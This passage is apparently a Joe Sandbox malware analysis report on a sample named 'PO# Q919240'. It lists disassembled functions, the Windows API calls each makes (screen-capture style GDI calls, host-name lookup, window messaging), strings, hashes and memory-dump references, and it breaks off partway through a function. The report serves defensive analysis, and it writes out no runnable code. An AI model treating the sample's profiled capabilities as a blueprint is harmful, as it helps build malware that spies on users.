                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: InfoItemMenu$Sleep
                • String ID: 0
                • API String ID: 1196289194-4108050209
                • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 0043143E
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                • SelectObject.GDI32(00000000,?), ref: 00431466
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                • String ID: (
                • API String ID: 3300687185-3887548279
                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1976180769-4113822522
                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                • String ID:
                • API String ID: 461458858-0
                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                • CloseHandle.KERNEL32(00000000), ref: 00430113
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                • GlobalFree.KERNEL32(00000000), ref: 00430150
                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                • DeleteObject.GDI32(?), ref: 004301D0
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3969911579-0
                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                • String ID: 0
                • API String ID: 956284711-4108050209
                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 1965227024-3771769585
                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: SendString$_memmove_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 369157077-1007645807
                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32 ref: 00445BF8
                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                • __wcsicoll.LIBCMT ref: 00445C33
                • __wcsicoll.LIBCMT ref: 00445C4F
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 3125838495-3381328864
                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                • _wcscpy.LIBCMT ref: 004787E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                • API String ID: 3052893215-2127371420
                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                • __swprintf.LIBCMT ref: 0045E7F7
                • _wprintf.LIBCMT ref: 0045E8B3
                • _wprintf.LIBCMT ref: 0045E8D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-2354261254
                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __swprintf_wcscpy$__i64tow__itow
                • String ID: %.15g$0x%p$False$True
                • API String ID: 3038501623-2263619337
                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                Download Yara Rule
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                • __swprintf.LIBCMT ref: 0045E5F6
                • _wprintf.LIBCMT ref: 0045E6A3
                • _wprintf.LIBCMT ref: 0045E6C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-8599901
                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                Download Yara Rule
                APIs
                • timeGetTime.WINMM ref: 00443B67
                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                • SetActiveWindow.USER32(00000000), ref: 00443BEC
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
